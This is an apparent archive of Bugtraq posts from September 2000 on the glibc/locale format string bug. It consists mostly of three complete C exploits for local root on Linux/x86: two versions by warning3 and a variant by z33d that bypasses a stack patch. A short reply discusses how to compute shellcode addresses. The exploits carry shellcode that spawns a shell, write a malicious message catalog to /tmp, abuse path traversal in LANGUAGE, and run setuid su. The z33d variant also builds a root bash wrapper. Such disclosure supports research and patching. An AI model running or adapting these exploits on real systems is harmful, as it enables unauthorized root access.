5442114 2000-09-07 05:10 /146 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12636>
Ärende: glibc/locale exploit for linux/x86
------------------------------------------------------------
From: Warning3 <warning3@MAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <200009061306.VAA02539@intra.nsfocus.com>
Hi,
I write an exploit for testing the glibc/locale format string
vulnerability. It is tested in RedHat 6.2 with kernel 2.2.16.
regards,
warning3 <mailto:warning3@nsfocus.com>
/* exploit for glibc/locale format strings bug.
* Tested in RedHat 6.2 with kernel 2.2.16.
* Script kiddies: you should modify this code
* slightly by yourself. :)
*
* Greets: Solar Designer, Jouko Pynnvnen , zenith parsec
*
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
*
* by warning3@nsfocus.com (http://www.nsfocus.com)
* y2k/9/6
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define DEFAULT_OFFSET 550
#define DEFAULT_ALIGNMENT 2
#define DEFAULT_RETLOC 0xbfffd2ff
#define DEFAULT_BUFFER_SIZE 2048
#define DEFAULT_EGG_SIZE 1024
#define NOP 0x90
#define PATH "/tmp/LC_MESSAGES"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
char *buff, *buff1, *ptr, *egg;
char *env[3];
long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr;
int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;
int i,reth,retl,num=113;
FILE *fp;
if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) num = atoi(argv[3]);
if (argc > 4) align = atoi(argv[4]);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) eggsize = atoi(argv[6]);
printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize>
<eggsize> \n",argv[0]);
if (!(buff = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(buff1 = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
printf("Using RET location address: 0x%x\n", retloc);
shell_addr = get_esp() + offset;
printf("Using Shellcode address: 0x%x\n", shell_addr);
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4);
ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
ptr = buff1;
for(i = 0 ; i < num ; i++ )
{
memcpy(ptr, "%.8x", 4);
ptr += 4;
}
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
(0x10000 + reth - retl));
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", buff1);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
env[0] = egg ;
env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[2] = (char *)0 ;
execle("/bin/su","su","-u", buff, NULL,env);
} /* end of main */
(5442114) ------------------------------------------(Ombruten)
Kommentar i text 5444833 av Brevbäraren (som är implementerad i) Python
5444833 2000-09-07 18:51 /42 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12646>
Kommentar till text 5442114 av Brevbäraren (som är implementerad i) Python
Ärende: Re: glibc/locale exploit for linux/x86
------------------------------------------------------------
From: Olaf Kirch <okir@CALDERA.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000907104337.T2636@monad.swb.de>
On Wed, Sep 06, 2000 at 09:01:47PM +0800, Warning3 wrote:
> printf("Using RET location address: 0x%x\n", retloc);
> shell_addr = get_esp() + offset;
I've always wondered why all these exploits mess around with
strange offsets... When the ix86 Linux kernel execs an ELF program,
the stack looks like this (at least it did every time I checked)
0x80000000
0x7FFFFFFC 00 00 00 00
argv[0] + NUL byte
last envar
...
first envar
argv
So it's easy to compute the start of your shell code without
having to rely on magic offsets:
shell_addr = (caddr_t) 0x7FFFFFFC
- strlen(ARGV0) - 1
- strlen(EGG) - 1;
...
n = 0;
myenv[n++] = ...
myenv[n++] = EGG;
myenv[n++] = NULL;
execle(VICTIM_PROGRAM, ARGV0, ..., NULL, myenv);
Just wondering...
Olaf
--
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir@caldera.de +-------------------- Why Not?! -----------------------
UNIX, n.: Spanish manufacturer of fire extinguishers.
(5444833) ------------------------------------------
5444806 2000-09-07 18:40 /132 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12643>
Kommentar till text 5444805 av Brevbäraren (som är implementerad i) Python
Ärende: Bilaga (locale.c) till: Re: glibc/locale exploit for linux/x86
------------------------------------------------------------
/* exploit for glibc/locale format strings bug.
* Tested in RedHat 6.2 with kernel 2.2.16.
* Script kiddies: you should modify this code
* slightly by yourself. :)
*
* Greets: Solar Designer, Jouko Pynnvnen , zenith parsec
*
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
*
* by warning3@nsfocus.com (http://www.nsfocus.com)
* y2k/9/6
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define DEFAULT_OFFSET 550
#define DEFAULT_ALIGNMENT 2
#define DEFAULT_RETLOC 0xbfffd250
#define DEFAULT_BUFFER_SIZE 2048
#define DEFAULT_EGG_SIZE 1024
#define NOP 0x90
#define PATH "/tmp/LC_MESSAGES"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
char *buff, *buff1, *ptr, *egg;
char *env[3];
long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr;
int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;
int i,reth,retl,num=111;
FILE *fp;
if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) num = atoi(argv[3]);
if (argc > 4) align = atoi(argv[4]);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) eggsize = atoi(argv[6]);
printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize>
<eggsize> \n",argv[0]);
if (!(buff = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(buff1 = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
printf("Using RET location address: 0x%x\n", retloc);
shell_addr = get_esp() + offset;
printf("Using Shellcode address: 0x%x\n", shell_addr);
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4);
ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
ptr = buff1;
for(i = 0 ; i < num ; i++ )
{
memcpy(ptr, "%.8x", 4);
ptr += 4;
}
sprintf(ptr, "%%x%%%uc%%hn%%%uc%%hn",(retl - num*8),
(0x10000 + reth - retl - 6));
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", buff1);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
env[0] = egg ;
env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[2] = (char *)0 ;
execle("/bin/su","su","-u", buff, NULL,env);
} /* end of main */
(5444806) ------------------------------------------(Ombruten)
5446062 2000-09-08 02:53 /174 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12668>
Ärende: glibc language
------------------------------------------------------------
From: Maurycy Prodeus <z33d@ETH-SECURITY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.3.96.1000907235942.5333A-100000@sv>
/*
* "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)"
* - greg@tenet.pl -
*
* GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000
* with bypassing Solar Designer Stack Patch
*
* Dedicated to greg@tenet.pl
*
* It doesn't work. ;> Try use gdb to find special value.
* Tested on Debian 2.1/2.2 ziemniak
* Greetz:
* - abusers from if.pwr.wroc.pl :))) (IF-NET)
* - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :)
* - lcamtuf - argante rulz :)
* - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc...
* :))))))))))))))))))))))
* - secure@poz.sm.pl no i wogole #sigsegv
* funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
* - breslau killers z vx na czele :>
* - ppl from my so called real life
* - kefir truskawkowy
* most code I ripped :>
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#define DEFAULT_ALIGNMENT 2
// #define DEFAULT_RETLOC 0xbfffd2ff
// #define DEFAULT_RETLOC 0xbffff798
#define DEFAULT_RETLOC 0xbffff770
#define DEFAULT_BUFFER_SIZE 2048
#define PATH "/tmp/LC_MESSAGES"
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"dupaa"
"\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
"\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
// very special shellcode, 15 min ;> big thanks to yeti
char sh[]=
"#include <stdlib.h>\n"
"#include <stdio.h>\n"
"#include <unistd.h>\n"
"int main(){\n"
"setuid(0);\n"
"setgid(0);\n"
"system(\"/bin/bash\");\n"
"}\n";
int main(int argc, char *argv[]) {
char *buff, *buff1, *ptr;
char *env[3];
long shell_addr,retloc=DEFAULT_RETLOC;
int align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE;
int i,reth,retl,num=132; // maybe 121
struct stat j;
FILE *fp;
if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) num = atoi(argv[2]);
printf("Stay sharp ...\n");
printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]);
if (!(buff = malloc(1024))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(buff1 = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
printf("Using RET location address: 0x%x\n", retloc);
shell_addr=0x00124270; // or 0x00124250
printf("Using Shellcode address: 0x%x\n", shell_addr);
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4);
ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
ptr = buff1;
for(i = 0 ; i < num ; i++ )
{
memcpy(ptr, "%.8x", 4);
ptr += 4;
}
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
(0x10000 + reth - retl));
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
if (!fp){
printf("Skript kidies ?\n");
exit(0);
}
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR);
fstat(i,&j);
lseek(i,j.st_size-2,SEEK_SET);
write(i,"\0\0\0\0\0\0",6);
close(i);
fp = fopen("/tmp/sh.c","w+");
if (!fp){
printf("Skript kidies ?\n");
exit(0);
}
fprintf(fp,"%s",sh);
fclose(fp);
system("cd /tmp;gcc sh.c -o sh");
env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[1] = (char *)0 ;
execle("/bin/su","su","-u", buff, NULL,env);
perror("execle");
return 0;
}
- z33d -
--
Freestate
Let yourself go
Let yourself go
Let your senses overflow
Step out of your cage
And onto the stage
It's time to start
Playing your part
Freedom awaits
Open the gates
Open your mind
Freedom's a state
/ Depeche Mode
(5446062) ------------------------------------------